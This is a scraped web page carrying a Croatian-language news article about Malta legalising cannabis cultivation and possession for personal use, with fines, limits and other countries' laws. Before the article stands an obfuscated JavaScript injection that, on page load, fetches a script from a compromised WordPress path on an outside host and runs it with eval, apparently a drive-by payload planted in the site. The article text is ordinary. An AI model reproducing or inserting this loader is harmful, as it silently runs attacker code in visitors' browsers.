;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Malta je postala prva država EU koja je legalizirala kanabis

Najmanja država u EU-u postala je i prva u Uniji koja je legalizirala uzgoj i posjedovanje kanabisa za osobnu upotrebu.

Odrasli će moći nositi do sedam grama kanabisa, a kod kuće uzgajati najviše četiri biljke, ali pušenje u javnosti ili pred djecom bit će protuzakonito.

Nekoliko drugih zemalja ima slične planove, poput Njemačke, Luksemburga i Švicarske. Zemlje poput Nizozemske toleriraju upotrebu kanabisa u određenim okolnostima.

Parlament Malte glasao je za reformu, a zakon je dobio 36 glasova za i 27 protiv.

Ministar ravnopravnosti, Owen Bonnici, rekao je da će “povijesni” potez spriječiti male korisnike kanabisa da se suoče sa sustavom kaznenog pravosuđa i “zauzdati trgovinu drogom osiguravajući da korisnici sada imaju siguran i reguliran put odakle mogu nabaviti kanabis”.

Međutim, malteška oporbena Nacionalistička stranka glasala je protiv promjene.

U listopadu je njihov čelnik Bernard Grech – koji je isprva podržao novi zakon – upozorio da će on “dovesti samo do jačanja ilegalnog tržišta, uz iskorištavanje organiziranog kriminala”, navodi The Times.

Prema promjenama, svatko tko nosi više od sedam grama, ali manje od 28 g mogao bi biti kažnjen do 100 eura (85 funti; 112 dolara).

Kazna za pušenje u javnosti bit će kazna od 235 eura, a oni koji puše kanabis pred očima mlađih od 18 godina mogu biti kažnjeni do 500 eura.

Osnovat će se udruge za distribuciju droge ili sjemena za uzgoj kanabisa, čime će se regulirati koliko netko kupuje – a osoba može biti član samo jedne udruge.

Tu je i podrška maloljetnicima kod kojih se nađe kanabis. Preporučit će im se plan skrbi ili liječenja umjesto suočavanja s uhićenjem ili kaznenom prijavom.

Zakoni o kanabisu diljem svijeta

Potez Malte, najmanje države članice EU-a, vjerojatno će biti prvi od brojnih nacija koje mijenjaju svoje zakone o kanabisu nakon što je UN prošle godine reklasificirao kanabis kako bi priznao njegovu terapeutsku upotrebu.

Vlade Luksemburga, Njemačke i Švicarske najavile su planove za uspostavu pravno reguliranog tržišta.

Kanabis je još uvijek tehnički ilegalan u Nizozemskoj, koja je poznata po svojim kafićima s kanabisom. Međutim, postoji tolerancija na lijek kada se prodaje u kafićima.

Italija će održati referendum o tom pitanju uskoro, dok Južna Afrika, Meksiko, Jamajka, Portugal i brojne američke države već imaju slične zakone.

Urugvaj je bio prva zemlja na svijetu koja je legalizirala kanabis za osobnu upotrebu 2013., a slijedila ga je Kanada 2018. godine.

Tags: ,
Choose your Reaction!
Leave a Comment